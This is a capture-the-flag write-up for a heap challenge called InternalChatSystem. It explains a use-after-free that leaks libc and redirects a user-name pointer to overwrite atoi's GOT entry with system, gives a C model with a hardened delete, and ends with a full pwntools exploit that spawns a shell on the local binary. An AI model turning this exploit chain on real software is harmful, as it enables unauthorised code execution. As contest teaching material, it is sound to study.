internal chat (Christmas Fun Contest)
internal chat
Checking the protections enabled on the challenge binary:
With no PIE and a writable GOT, the obvious plan is to overwrite a GOT entry to get a shell.
First we register a user. The user structure is as follows:
struct user
{
    char *user_name;
    __int64 age;
    char description[0x100];
    _QWORD *addr;
    _QWORD *friend_addr;
    __int64 flag;            // marks whether the user has been deleted
};
The vulnerability is in the add/delete friend routine: when a user is deleted, the user structure is freed but the pointer to it is not cleared, leaving a dangling pointer (use-after-free). On top of that, flag is the last qword of the 0x128-byte structure, which lives in a 0x130 chunk, so it overlaps the prev_size field of the next chunk; when the structure is freed, free() writes the chunk size there, flag becomes non-zero again, and the user never looks deleted.
leak_libc
We first delete the user. show has no check for deleted users and prints the user's info. The freed 0x130 chunk goes into the unsorted bin, so its fd/bk pointers, which overlap the user_name and age fields, point into main_arena (main_arena+88); the Age field printed by show therefore leaks a libc address.
Overwriting the atoi GOT entry
Now register another user with a name size of 0x128. The name buffer then reuses the freed user structure, so the first 8 bytes of the name become the dead user's user_name pointer; we write the address of atoi's GOT entry there. With the leaked libc base we compute the real address of atoi and log in as the deleted first user by sending those address bytes as the name: login compares the input with whatever user_name points to, which is now the content of atoi@got. Then we change the name; that write goes through user_name into the GOT, so we replace atoi with system. The menu choice is parsed with atoi, so the next input, /bin/sh, is handed to system and we get a shell.
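As an added example (not code from the challenge binary or from the author's exploit), the following C model replays the chain described in the last two sections against a miniature user table: a delete that frees the struct but leaves the table pointer dangling, a 0x128-byte name allocation that lands on the freed struct, a login that compares against whatever user_name points to, and a name change that writes through it into a constructed fake GOT slot. FAKE_ATOI, FAKE_SYSTEM and fake_got are stand-ins I made up; the chunk reuse relies on glibc's malloc handing the freed 0x130 chunk back to the next malloc(0x128). A hardened delete sits beside the vulnerable one, and flag_overlaps_next_prev_size() checks the chunk-geometry claim above with glibc's request rounding.

```c
/* Added example, not the challenge's code or the author's exploit: a small model of
 * the InternalChatSystem user table reproducing the dangling pointer left by delete
 * and the name-pointer hijack, with a hardened delete beside it. fake_got, FAKE_ATOI
 * and FAKE_SYSTEM are constructed stand-ins; the reuse step assumes glibc malloc. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct user {
    char *user_name;
    int64_t age;
    char description[0x100];
    uint64_t *addr;
    uint64_t *friend_addr;
    int64_t flag;                         /* 1 = live, 0 = deleted */
};

#define MAX_USERS 4
static struct user *users[MAX_USERS];     /* user table */
static struct user *current;              /* logged-in user */
#define FAKE_ATOI   0x7f1234567890ULL     /* constructed "atoi" address */
#define FAKE_SYSTEM 0x7f1234569ab0ULL     /* constructed "system" address */
static uint64_t fake_got[1];              /* slot 0 stands in for atoi@got */

/* glibc rounds a 0x128 request up to a 0x130 chunk, so the next chunk's prev_size
 * sits at user pointer + 0x120, exactly where flag lives; free() of a chunk bound
 * for the unsorted bin writes 0x130 there, so a "deleted" flag comes back non-zero. */
static int flag_overlaps_next_prev_size(void) {
    size_t chunk = (sizeof(struct user) + 8 + 15) & ~(size_t)15;
    return chunk == 0x130 && offsetof(struct user, flag) == chunk - 0x10;
}

static int register_user(size_t name_size, const void *name, size_t len) {
    int i = 0;
    while (i < MAX_USERS && users[i]) i++;
    if (i == MAX_USERS) return -1;
    char *buf = malloc(name_size);        /* name buffer first, as the challenge prompts */
    memcpy(buf, name, len);
    users[i] = calloc(1, sizeof(struct user));
    users[i]->user_name = buf;
    users[i]->flag = 1;
    return i;
}

/* The bug: the struct is freed but users[i] keeps pointing at it. */
static void delete_vuln(int i) { free(users[i]); }

/* Hardened: free everything and clear the slot, so no lookup can reach freed memory. */
static void delete_fixed(int i) {
    free(users[i]->user_name); free(users[i]);
    users[i] = NULL;
}

/* login strcmp()s the input against each entry's user_name, wherever it points. */
static struct user *login(const char *name) {
    for (int i = 0; i < MAX_USERS; i++)
        if (users[i] && strcmp(users[i]->user_name, name) == 0)
            return current = users[i];
    return NULL;
}

/* "change name" writes through current->user_name. */
static void change_name(const void *name, size_t len) { memcpy(current->user_name, name, len); }

/* p64(): little-endian qword stored as a NUL-terminated C string. */
static void p64(uint64_t v, char out[9]) {
    for (int i = 0; i < 8; i++) out[i] = (char)(v >> (8 * i));
    out[8] = '\0';
}

static void reset(void) { memset(users, 0, sizeof users); current = NULL; fake_got[0] = FAKE_ATOI; }

/* Replay the attack against the vulnerable delete; returns the final GOT value. */
static uint64_t run_vulnerable(void) {
    char got_ptr[9], atoi_bytes[9], system_bytes[9];
    reset();
    int a = register_user(0x60, "aaaaaa", 7);
    void *guard = malloc(0x20);           /* keeps the freed struct from merging into top */
    delete_vuln(a);                       /* users[a] now dangles */
    /* A 0x128-byte name reuses the freed struct; its first 8 bytes are users[a]->user_name. */
    p64((uint64_t)(uintptr_t)&fake_got[0], got_ptr);
    register_user(0x128, got_ptr, 8);
    p64(FAKE_ATOI, atoi_bytes);           /* the dead user's "name" is now atoi@got's content */
    if (login(atoi_bytes) != users[a]) return 0;
    p64(FAKE_SYSTEM, system_bytes);
    change_name(system_bytes, 8);         /* goes through user_name into fake_got[0] */
    free(guard);
    return fake_got[0];                   /* 0x7f1234569ab0: atoi@got now holds "system" */
}

/* Same sequence against the hardened delete: the slot is gone and login fails. */
static int run_fixed(void) {
    char atoi_bytes[9];
    reset();
    int a = register_user(0x60, "aaaaaa", 7);
    delete_fixed(a);
    p64(FAKE_ATOI, atoi_bytes);
    return users[a] == NULL && login(atoi_bytes) == NULL;   /* 1 */
}
```

Under glibc, run_vulnerable() returns 0x7f1234569ab0 (the fake GOT slot now holds the system stand-in) and run_fixed() returns 1, because clearing the table slot makes the dead user unreachable. One caveat on the flag trick: on glibc 2.26 and later a 0x130 chunk is put in tcache first, and tcache does not touch the next chunk's prev_size, so the flag clobber described above is pre-tcache behaviour; clearing the pointer instead of trusting a marker inside the freed object is the fix either way.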
exp
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
p = process('./InternalChatSystem')
elf = ELF('./InternalChatSystem')

def debug(addr):
    gdb.attach(p, "b *" + str(addr))

def register(name_size, name, age, payload):
    p.recvuntil("Your choice:")
    p.sendline("2")
    p.recvuntil("Input your name size:")
    p.sendline(str(name_size))
    p.recvuntil("Input your name:")
    p.sendline(name)
    p.recvuntil("Input your age:")
    p.sendline(str(age))
    p.recvuntil("Input your description:")  # description <= 0x100
    p.sendline(payload)

def login(name):
    p.recvuntil("Your choice:")
    p.sendline("1")
    p.recvuntil("Please input your user name:")
    p.sendline(name)

def send_message(name, title, content):
    p.recvuntil("Your choice:")
    p.sendline('4')
    p.recvuntil("Which user do you want to send a msg to:")
    p.sendline(name)
    p.recvuntil("Input your message title:")
    p.send(title)
    p.recvuntil("Input your content:")
    p.send(content)

def delete(name):
    p.recvuntil("Your choice:")
    p.sendline("3")
    p.recvuntil("Input the friend's name:")
    p.sendline(name)
    p.recvuntil("So..Do u want to add or delete this friend?(a/d)")
    p.sendline("d")

def add(name):
    p.recvuntil("Your choice:")
    p.sendline("3")
    p.recvuntil("Input the friend's name:")
    p.sendline(name)
    p.recvuntil("So..Do u want to add or delete this friend?(a/d)")
    p.sendline("a")

def show():
    p.recvuntil("Your choice:")
    p.sendline("1")

def out():
    p.recvuntil("Your choice:")
    p.sendline("6")

def change(name, age, description):
    p.recvuntil("Your choice:")
    p.send("2")
    p.recvuntil("Input your name:")
    p.send(name)
    p.recvuntil("Input your age:")
    p.send(str(age))
    p.recvuntil("Input your description:")
    p.send(description)

# Register a user, log in, send it a message, add it as a friend, then delete it:
# the user struct is freed but stays reachable.
register(0x60, 'aaaaaa', 30, '1' * 0x16)
login('aaaaaa')
send_message('aaaaaa', '\x01' * 32, '\x02' * 32)
add('aaaaaa')
# debug(0x400f51)
delete("aaaaaa")
# debug(0)

# show prints the freed struct; the Age field is the unsorted-bin bk pointer (main_arena+88).
show()
p.recvuntil("Age:")
main_arena = int(p.recv(12), 16) - 88
malloc_hook = main_arena - 0x10
print(hex(main_arena))
libc = LibcSearcher('__malloc_hook', malloc_hook)
libc_base = malloc_hook - libc.dump('__malloc_hook')
atoi_addr = libc_base + libc.dump('atoi')
system_addr = libc_base + libc.dump('system')
# 0choice
print(hex(atoi_addr))
print(hex(elf.got['atoi']))

out()
# A 0x128-byte name reuses the freed user struct; its first 8 bytes become the
# dead user's user_name pointer, which we aim at atoi's GOT entry.
register(0x128, p64(elf.got['atoi']), 30, '1' * 4)
# login compares our input with the bytes at atoi@got, i.e. atoi's address.
login(p64(atoi_addr))
# Changing the name writes through user_name: atoi@got now holds system.
change(p64(system_addr), 18, 'a')
# The menu choice goes through atoi(), so this becomes system("/bin/sh").
p.recvuntil("Your choice:")
p.send('/bin/sh')
p.recvuntil("Your choice:")
p.sendline('/bin/sh')
p.interactive()
